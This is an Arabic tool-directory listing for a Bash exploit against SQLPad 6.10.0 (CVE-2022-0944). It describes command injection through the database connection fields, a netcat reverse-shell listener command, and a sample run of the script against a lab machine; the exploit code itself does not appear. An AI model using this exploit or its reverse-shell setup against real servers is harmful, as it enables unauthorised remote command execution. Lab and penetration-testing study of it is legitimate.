Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SQLPad-6.10.0-Exploit-CVE-2022-0944 — Refurbish | Kitploit
أدوات/GitHubGitHub/0xdtc/sqlpad-6.10.0-exploit-cve-2022-0944
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHub0xdtc/sqlpad-6.10.0-exploit-cve-2022-0944

SQLPad-6.10.0-Exploit-CVE-2022-0944

Refurbish

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

SQLPad 6.10.0 إكسبلويت (CVE-2022-0944)

يقوم هذا السكريبت Bash باستغلال ثغرة تنفيذ أكواد عن بُعد (RCE) في SQLPad 6.10.0، مما يسمح للمهاجم بتحقيق تنفيذ أكواد عن بُعد (RCE) عن طريق إساءة استخدام حقلي host و database في إعدادات اتصال قاعدة بيانات MySQL في SQLPad. يستغل الإكسبلويت معالجة SQLPad غير الآمنة لوحدة child_process في Node.js لتنفيذ أوامر عشوائية، مما يفتح في النهاية قشرة عكسية (reverse shell) على جهاز المهاجم.

المتطلبات الأساسية

  1. مستمع Netcat: تأكد من وجود مستمع نشط على جهازك باستخدام nc -lvnp 9001.
  2. الوصول إلى الخادم الهدف: يفترض هذا الإكسبلويت أنك تستطيع التواصل مع مثيل SQLPad الضعيف.

الاستخدام

  1. استنساخ المستودع (أو نسخ السكريبت محليًا).
  2. تشغيل السكريبت:
root@kitploit:~
┌──(kali㉿kali)-[~/HTB/machines/sightless]
└─$ ./CVE-2022-0944
Please make sure to start a listener on your attacking machine using the command:
nc -lvnp 9001
Waiting for you to set up the listener...
Press [Enter] when you are ready...
Please provide the target host (e.g., x.x.com): 
x.example.com
Please provide your IP address (e.g., 10.10.16.3): 
0.0.0.0
Exploit sent. If everything went well, check your listener for a connection on port 9001.
  1. اتبع مطالبات السكريبت لإدخال الخادم الهدف وعنوان IP الخاص بك، ثم انتظر اتصال القشرة العكسية.

تفاصيل

  • CVE: CVE-2022-0944
  • النسخة المتأثرة: SQLPad 6.10.0
  • الثغرة: تنفيذ أكواد عن بُعد (RCE) عبر حقن القالب (template injection)
  • التأثير: يسمح هذا الإكسبلويت للمهاجم بتنفيذ أوامر على الخادم الهدف بصلاحيات عملية SQLPad.

إخلاء مسؤولية

هذا الكود لأغراض تعليمية فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. استخدم هذا الإكسبلويت فقط بإذن.

تنزيل الأداة